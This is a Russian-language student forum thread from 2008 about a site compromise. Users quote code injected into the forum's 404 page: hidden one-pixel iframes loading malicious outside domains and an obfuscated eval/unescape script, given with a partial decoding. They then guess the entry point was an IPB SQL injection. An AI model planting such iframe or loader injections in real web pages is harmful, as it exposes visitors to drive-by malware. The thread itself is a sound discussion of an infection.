[ Поиск ] - [ Пользователи ] - [ Календарь ]
Полная Версия: Даун форума 14-го и 15-го числа
Студенческий форум Орла Ostudent.ru > Книга жалоб и предложений
RoDen
15.06.2008 - 19:58
Содержимое 404.php изменяется в зависимости от Вашего браузера.
В опере, в режиме эмуляции IE можно увидеть другой код, менее безопасный.
счастливым обладателям IE рекомендуем провериться

PS спасибо крокодилу за бдительность
Sergey-from-Orel
16.06.2008 - 12:06
Цитата
<iframe src="http://sum4count.net/strong/045/" width=1 height=1></iframe>
<iframe src="http://ceqypawkht.com/dl/adv646.php" width=1 height=1></iframe> <!--LiveInternet counter-->< type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank><img src='http://counter.yadro.ru/hit?t27.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано количество просмотров и"+
" посетителей' "+
"border=0 width=88 height=120><\/a>")//--></script><br>

А вот и код для IE, Не любят они IE!

http://ceqypawkht.com/dl/adv646.php кажется, не доступно, а http://sum4count.net/strong/045/
Цитата
<>
eval(unescape('%0a%76%61%72%20%57%64%68%3d%27%64%65%39%33%36%66%62
8%37%34%36%64%36%63%33%65%30%61%33%63%36%32%36%66%36%34%37%39%
<...>
%36%62%25%34%63%25%37%37%25%32%39%25%32%39%25%33%62%27%29%29%3b'));
</script>


Скрипт очень старательно замаскирован, вот частичная расшифровка.
Цитата
var
Wdh='de936fb773830488297d193f3c68746d6c3e0a3c626f64793e3c6469762069643d226d79646
<...>
7fd5';
var jykLw = ''; var M = Wdh.slice ( 24, 12430 ); for ( E = 24 ; E < 12430 ; E += 2 ){ jykLw += '%' + Wdh.slice ( E, E + 2 ); }document.write(unescape(jykLw));


Теперь, господа, вопрос.

Как сий вирус попал на сайт? FTP? Или дырки ipb? Расскажите, так, для общего развития.
---
P.S. Злой форум заменяет <sсript> на <>. Нехорошо!
дед_мажор
19.06.2008 - 08:39
Цитата (Sergey-from-Orel)
Или дырки ipb?

это самый вероятный вариант. не удивлюсь, если случайным образом на форуме обнаружатся пользоватли с полными админскими правами, или еще что-нибудь в этом роде, потому что, скорее всего, эксплуатировался sql injection.
Fast Reply:
Powered by dgreen

 Enable Smilies |  Enable Signature
Здесь расположена полная версия этой страницы.
Студенческий клуб ostudent.ru и его создатели не несут ответственности за достоверность самостоятельно размещаемой посетителями сайта информации и не могут подтвердить или опровергнуть её.
Рейтинг@Mail.ru
Invision Power Board © 2001-2025 Invision Power Services, Inc.